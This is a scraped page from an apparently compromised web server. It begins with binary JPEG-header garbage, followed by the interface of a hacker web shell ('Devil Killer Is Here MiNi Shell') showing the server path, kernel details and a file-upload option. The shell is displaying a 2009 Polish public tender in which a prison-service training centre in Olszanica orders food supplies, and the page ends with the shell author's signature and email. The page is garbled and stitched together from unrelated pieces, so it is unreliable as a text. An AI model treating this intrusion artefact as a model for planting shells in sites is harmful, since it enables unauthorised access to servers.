JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090225/39908-N-2009.html

<p class="kh_header"><b>Olszanica: Dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 39908 - 2009; data zamieszczenia: 25.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Doskonalenia Kadr Służby Więziennej w Olszanicy , 38-722 Olszanica, woj. podkarpackie, tel. 0-13 4617450, faks 0-13 4617300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1:
1.Cukier kryształ - 600 kg
2.Miód naturalny - 17 kg
3.Baton Bounty - 7 kg
4.Baton Snickers - 20 kg
5.Baton Mars - 2 kg
6.Wafel Princessa - 21 kg
7.Ciastka Delicje szampańskie - 100 kg
8.Ciastka Jeżyki - 31 kg
9.Czekolada gorzka - 3 kg
10.Czekolada nadziewana Alpen Gold - 6 kg
11.Czekoladki z kremem i orzechami - 70 kg
12.Paluszki słone Lajkonik - 37 kg
13.Chipsy Lays - 7 kg
14.Orzeszki ziemne Felix - 13 kg
15.Herbata Lipton - 33 kg
16.Herbata owocowa - 6 kg
17.Kawa rozpuszczalna Nescafe - 56 kg
18.Dżem wiśniowy - 10 kg
19.Dżem truskawkowy - 15 kg
20.Galaretka spożywcza owocowa - 13 kg
21.Budyń śmietankowy - 3 kg
22.Kakao rozpuszczalne instant - 11 kg
23.Ananas w puszce - 77 kg
24.Brzoskwinia w puszce - 38 kg
25.Sól kuchenna jodowana - 175 kg
26.Sól czosnkowa - 1 kg
27.Ziele angielskie - 2 kg
28.Liście laurowe - 2 kg
29.Kminek - 2 kg
30.Majeranek - 2 kg
31.Imbir mielony - 1 kg
32.Papryka mielona słodka - 7 kg
33.Pieprz czarny mielony - 8 kg
34.Gałka muszkatołowa mielona - 1 kg
35.Przyprawa curry - 2 kg
36.Przyprawa Vegeta - 17 kg
37.Kwasek cytrynowy spożywczy - 6 kg
38.Żelatyna spożywcza - 4 kg
39.Majonez Hellmanns - 170 kg
40.Musztarda - 95 kg
41.Ketchup łagodny - 103 kg
42.Ocet - 10 litrów
43.Makaron extra 100 % durum  - 163 kg
44.Mąka pszenna - 390 kg
45.Mąka ziemniaczana - 6 kg
46.Płatki kukurydziane Corn Flakes - 61 kg
47.Płatki Frutina z kawałkami owoców - 21 kg
48.Kasza kuskus - 12 kg
49.Kasza jęczmienna - 40 kg
50.Kasza manna - 6 kg
51.Ryż biały - 90 kg
52.Pieczarki marynowane - 10 kg
53.Papryka konserwowa - 125 kg
54.Ogórek konserwowy - 125 kg
55.Fasolka czerwona konserwowa - 8 kg
56.Szparagi konserwowe całe - 2 kg
57.Kukurydza konserwowa Bonduelle - 25 kg
58.Kukurydza mini kolby - 25 kg
59.Groszek konserwowy Bonduelle - 55 kg
60.Chrzan tarty w occie - 10 kg
61.Seler paski - 82 kg
62.Śliwka suszona kalifornijska - 13 kg
63.Koncentrat pomidorowy - 67 kg
64.Koncentrat z buraków - 2 kg
65.Oliwki zielone - 4 kg
66.Sok jabłkowy 0,2 l - 145 litrów
67.Sok wieloowocowy 0,2 l - 40 litrów
68.Sok pomarańczowy - 607 litrów
69.Sok jabłkowy - 565 litrów
70.Sok z czarnej porzeczki - 225 litrów
71.Sok pomarańczowy Hortex - 120 litrów
72.Sok grejpfrutowy Hortex - 60 litrów
73.Sok ananasowy Hortex - 24 litry
74.Sok jabłkowy Hortex - 30 litrów
75.Sok z czarnej porzeczki - 45 litrów
76.Sok bananowy - 36 litrów
77.Sok pomidorowy Hortex - 24 litry
78.Woda mineralna gazowana 0,5 l - 728 litrów
79.Woda mineralna gazowana 1,5 l - 45 litrów
80.Woda mineralna niegazowana 1,5 l - 36 litry
81.Napój Coca-Cola 0,5 l - 120 litrów
82.Napój Fanta 0,5 l - 120 litrów
83.Napój Coca-Cola 1,0 l - 132 litry
84.Napój Sprite 1,0 l - 42 litry
85.Napój Fanta 1,0 l - 36 litrów
86.Napój Tonic Kinley 1,0 l - 24 litry
87.Napój gazowany kolorowy - 157 litrów
88.Napój energetyczny Red Bull - 12 litrów
89.Syrop Paola malinowy - 25 litrów
90.Olej uniwersalny - 395 litrów
91.Konserwa tuńczyk kawałki w oleju - 44 kg
92.Konserwa szprot w pomidorach - 15 kg
93.Pasztet z drobiu - 60 kg
94.Szynka konserwowa - 67 kg
95.Szynka wieprzowa LBS - 17 kg
Zadanie nr 2:
1.Zupa w proszku krem z borowików Knorr - 12 kg
2.Zupa w proszku krem z pieczarek Knorr - 13 kg
3.Zupa w proszku krem ze szpinaku Knorr - 15 kg
4.Zupa w proszku cebulowa Knorr - 5 kg
5.Zupa w proszku żurek Knorr - 13 kg
6.Przyprawa do zup Delikat w płynie Knorr - 80 kg
7.Rosół z kury w kostkach Knorr - 52 kg
8.Sos grzybowy w proszku Knorr - 12 kg
9.Sos sałatkowy ogrodowy w proszku Knorr - 6 kg
10.Groszek ptysiowy Knorr - 8 kg
11.Delikat przyprawa do grilla Knorr - 3 kg
12.Delikat przyprawa do ryb Knorr - 1 kg
13.Delikat przyprawa do drobiu Knorr - 12 kg
14.Napój owocowy w proszku - 85 kg.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6, 15.90.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium przez wykonawców<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2. Ocena spełnienia warunków w postępowaniu o udzielenie zamówienia:
1) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: -spełnia- lub -nie spełnia- poszczególne warunki. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy z postępowania o udzielnie zamówienia w oparciu o przesłanki zawarte w art. 24 ustawy Prawo zamówień publicznych;
2) Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie dokumentów o których mowa w rozdziale VI niniejszej specyfikacji..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca składa następujące dokumenty:
1) oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych (załącznik nr 2);
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Wykonawcy, którzy wspólnie ubiegają się o zamówienie, dołączają również pełnomocnictwo, o którym mowa w art. 23 ust. 2 ustawy Prawo zamówień            publicznych oraz dokumenty i oświadczenia wyszczególnione w pkt 1, złożone przez wszystkich wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Doskonalenia Kadr Służby Więziennej w Olszanicy
Olszanica 222
38-722 Olszanica
woj. podkarpackie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2009 godzina 10:00, miejsce: Ofertę należy złożyć w recepcji Ośrodka Doskonalenia Kadr Służby Więziennej w Olszanicy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com